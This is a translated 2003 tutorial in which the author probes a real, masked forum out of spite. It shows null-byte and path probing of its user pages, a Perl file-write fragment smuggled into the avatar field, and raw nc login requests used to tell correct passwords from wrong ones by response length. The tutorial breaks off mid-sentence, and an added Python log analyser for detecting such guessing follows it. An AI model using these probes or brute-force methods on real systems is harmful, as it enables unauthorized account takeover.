A simple script attack instance


Creation time: 2004-01-19

Article attribute: original

Article submission:

THE0CRAT (THE0CRAT_AT_HOTMAIL.COM)

######################################################################

A simple script attack instance

Author: HBU Group · The0crat

E-mail: the0crat@hotmail.com

Date: 2003/8/18

######################################################################

First: Opening

Bored today, I went to a community forum in my area. The people there were slandering someone, and one post even infringed a friend's copyright; several people complained, but the administrator didn't care and didn't even look. I couldn't keep watching, so I decided to give the administrator a wake-up call.

Second: Preparation / analysis

Safety first: start an HTTP proxy, then open the community's login page. The URL shown in the address bar is

http://www.6***bbs.com/login.cgi

Open the page source and find the part that handles the login:

Password:

Therefore, the URL that submits the login information should be

http://www.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=

First look at the user information, because usernames and passwords are generally stored together, so that is where we are most likely to get close to what we want. Submit the following URL to view the user information for Silkroad:

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad

Returns normal user information.

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad

Also returns normal user information; it seems "./" has been filtered out.

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad%00

Prompts that this user is not registered :(

A scan shows FTP with a weak password ~ unfortunately the anonymous account doesn't get you much.

Back to the CGI. Just http://www.****bbs.com/rank.cgi is enough to show that this is YUZi's BBS3000. You could download the BBS3000 source and analyse it, but that takes more time, so let's look at a few sensitive places instead: http://www.6***bbs.com/photo.ci lets you upload an avatar.

Since the avatar is displayed as

the key is in the *** here, that is, the link.

Fill in QQ ~; open F, "> the0crat.txt"; .GIF and submit it; there is no prompt, and the program has not made any change.

It seems that without analysing the source code I can't get into the target server, so let's try guessing the community administrator's password instead; who knows, maybe I'm lucky today :)

Of course, the administrators of the community won't be idiots who set an empty password. When it comes to guessing a forum ID's password, what is the first thing you would do? Download some big, fancy hacker tool and hang a dictionary on it? Don't you ever get the urge to write a script and crack it yourself? Heh heh. Now I'll teach you step by step how to guess a password yourself :)

The general method of password guessing is:

1. Obtain a list of candidate passwords
        |
        v
2. Submit a password to the target  <-------------------+
        |                                                |
        v                                                |
3. Judge from the target's response whether the          |
   password is correct                                   |
        |                      |                         |
   password correct       password wrong                 |
        |                      |                         |
        v                      +-------------------------+
   return the user's                 next password
   password

The third step is the roundabout one; the other steps are easy to implement.

So start from the third step:

I don't know how other programs make this judgement. My guess is that they first fetch the page returned for a successful login and the page returned for a wrong password, then compare the differences between the two. There may be other ways, but I haven't thought of any ~~~ :)

So first register an ID: account asdfasdf, password asdfasdf. From the information obtained earlier, the URL this ID submits is

http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=

where what follows "username=" is the user ID and what follows "userpsd=" is the user password; then the community

Now use telnet (nc here) to get what we want:

F:\> nc -vv www.****bbs.com 80    <<<--- connect nc to the target's web service port; if you don't know what nc is, I'm not telling, heh heh
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1    <<<------- here the user's login URL from before is used, but with a wrong password
Host: IIS-Server

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html

fe7    <<<------------ note this
......

This is what comes back after an unsuccessful login.

Once more:

F:\> nc -vv www.****bbs.com 80
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1    <<<------- this is the right password
Host: IIS-Server

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html

18d    <<<------------ note this
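Seen from the server side, the same length difference that distinguishes a successful login from a failed one is recorded in the web server's access log (the bytes field), together with the credentials that a GET-based login like this one leaks into the query string. The following is an added example, mine rather than the author's or BBS3000's code: it scans constructed Apache-style log lines for bursts of login.cgi attempts against one username from one IP and reports the response sizes seen. The log lines, threshold and time window are assumptions; the sizes 4071 and 397 are the page's fe7 and 18d in decimal.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-style log lines: five failed guesses return the
# same size (0xfe7 = 4071), the sixth a different one (0x18d = 397); one
# unrelated login from another client is mixed in.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2003:11:59:41 +0000] "GET /login.cgi?username=admin&userpsd=guess1&menu=login&id= HTTP/1.1" 200 4071
10.0.0.5 - - [18/Aug/2003:11:59:43 +0000] "GET /login.cgi?username=admin&userpsd=guess2&menu=login&id= HTTP/1.1" 200 4071
10.0.0.9 - - [18/Aug/2003:11:59:50 +0000] "GET /login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1" 200 397
10.0.0.5 - - [18/Aug/2003:12:00:02 +0000] "GET /login.cgi?username=admin&userpsd=guess3&menu=login&id= HTTP/1.1" 200 4071
10.0.0.5 - - [18/Aug/2003:12:00:19 +0000] "GET /login.cgi?username=admin&userpsd=guess4&menu=login&id= HTTP/1.1" 200 4071
10.0.0.5 - - [18/Aug/2003:12:00:40 +0000] "GET /login.cgi?username=admin&userpsd=guess5&menu=login&id= HTTP/1.1" 200 4071
10.0.0.5 - - [18/Aug/2003:12:01:03 +0000] "GET /login.cgi?username=admin&userpsd=guess6&menu=login&id= HTTP/1.1" 200 397
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

def parse_line(line):
    """Extract client IP, timestamp, path, username parameter and response size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, _status, size = m.groups()
    parts = urlsplit(target)
    user = parse_qs(parts.query).get("username", [None])[0]
    return {"ip": ip, "when": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "path": parts.path, "user": user, "size": 0 if size == "-" else int(size)}

def find_guessing(log_text, threshold=5, window=timedelta(minutes=5)):
    """Flag (ip, username) pairs with >= threshold login.cgi hits inside window.
    Report the dominant response size and any odd sizes: a run of one size
    broken by a different one is exactly the success signal a guesser watches for."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].endswith("/login.cgi") and rec["user"]:
            attempts[(rec["ip"], rec["user"])].append(rec)
    alerts = {}
    for (ip, user), recs in attempts.items():
        recs.sort(key=lambda r: r["when"])
        # any `threshold` consecutive attempts falling inside `window` trigger an alert
        if any(recs[i + threshold - 1]["when"] - recs[i]["when"] <= window
               for i in range(len(recs) - threshold + 1)):
            sizes = Counter(r["size"] for r in recs)
            common = sizes.most_common(1)[0][0]
            alerts[(ip, user)] = {"attempts": len(recs), "usual_size": common,
                                  "odd_sizes": sorted(s for s in sizes if s != common)}
    return alerts
```

Beyond alerting, the obvious fixes on the BBS side are to accept credentials only via POST so they never land in the access log, and to rate-limit or lock out repeated failures per account and per client.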